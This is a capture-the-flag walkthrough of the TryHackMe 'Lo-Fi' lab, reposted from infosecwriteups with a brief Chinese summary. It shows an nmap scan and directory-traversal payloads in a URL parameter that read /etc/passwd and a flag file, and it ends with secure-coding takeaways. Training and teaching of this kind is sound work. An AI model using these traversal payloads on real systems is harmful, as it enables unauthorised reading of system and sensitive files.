Lo-Fi TCTF
通过nmap扫描发现目标设备的HTTP服务后,利用URL参数中的本地文件包含(LFI)漏洞读取系统文件并成功获取隐藏的flag.txt文件中的标志。强调了输入验证和访问控制的重要性以防止类似漏洞被利用。 2025-8-20 19:54:18 Author: infosecwriteups.com(查看原文) 阅读量:9 收藏

Death Esther

Want to hear some lo-fi beats, to relax or study to? We’ve got you covered!

This walkthrough is based on the TryHackMe lab “Lo-Fi” from Task 1. The challenge involves exploiting a Local File Inclusion (LFI) vulnerability to retrieve a hidden flag from the system.

To begin, perform an initial reconnaissance scan using nmap to identify open ports and running services:

nmap -sV -sC <ip>
death@esther:~$ nmap -sV -sC 10.10.63.207
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-03 22:43 IST
Nmap scan report for 10.10.63.207
Host is up (0.16s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Lo-Fi Music
|_http-server-header: Apache/2.2.22 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The presence of an open HTTP port (80) running Apache immediately caught my attention. Time to explore the website.

Press enter or click to view image in full size

On the surface, the website was pretty basic. It had five Lo-Fi music tracks, each with a play button. Nothing seemed unusual — until I clicked on a track and noticed something intriguing in the URL.

The website used a query parameter to fetch videos dynamically. This hinted at a potential Local File Inclusion (LFI) vulnerability.

Press enter or click to view image in full size

At this point, my instincts kicked in. Could this be vulnerable to LFI? There was only one way to find out.

LFI allows an attacker to include arbitrary files from the system, potentially exposing sensitive information. To test this, I attempted to access the /etc/passwd file—a classic move in LFI exploitation.

http://10.10.63.207/?page=../../../../etc/passwd

And boom! It worked.

Press enter or click to view image in full size

This meant I had full access to arbitrary files on the system. Now, it was time for the real prize — the hidden flag.

After several trial-and-error attempts, I discovered the flag stored in a file named flag.txt. I had expected something like User flag.txt, but surprisingly, it was much simpler than I had imagined!

http://10.10.63.207/?page=../../../../flag.txt

Press enter or click to view image in full size

Victory! The flag was mine, and the challenge was successfully completed.

This exercise reinforced the importance of secure coding practices. Here are some key takeaways:

  1. Always validate user input — Never trust external parameters without sanitization.
  2. Use whitelisting instead of blacklisting — Restrict file access to only necessary directories.
  3. Implement proper access controls — Sensitive files like /etc/passwd and flag.txt should never be accessible via a web application.

文章来源: https://infosecwriteups.com/lo-fi-tctf-e3e4ab6a9200?source=rss----7b722bfd1b8d---4
如有侵权请联系:admin#unsafe.sh